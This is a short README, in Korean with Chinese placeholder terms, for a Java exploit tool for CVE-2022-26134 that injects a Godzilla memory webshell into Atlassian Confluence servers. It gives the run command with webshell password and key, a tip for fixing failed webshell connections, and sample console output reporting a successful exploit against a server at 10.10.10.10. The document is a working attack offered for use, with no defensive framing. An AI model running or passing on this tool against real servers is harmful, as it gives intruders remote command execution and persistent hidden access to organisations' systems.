
Java 기반의 CVE-2022-26134 익스플로잇으로, Godzilla 웹쉘을 Atlassian Confluence 서버에 주입하여 원격 명령 실행 및 지속적인 메모리 셸 접근을 가능하게 합니다.
java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥
example
java -jar CVE-2022-26134.jar pass key
메모리 셸이 성공적으로 주입되었지만 Godzilla에 연결할 수 없는 경우 요청 구성에 다음 프로토콜 헤더를 추가하거나 Godzilla에 Burp 프록시를 구성하십시오.
Connection: close

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>
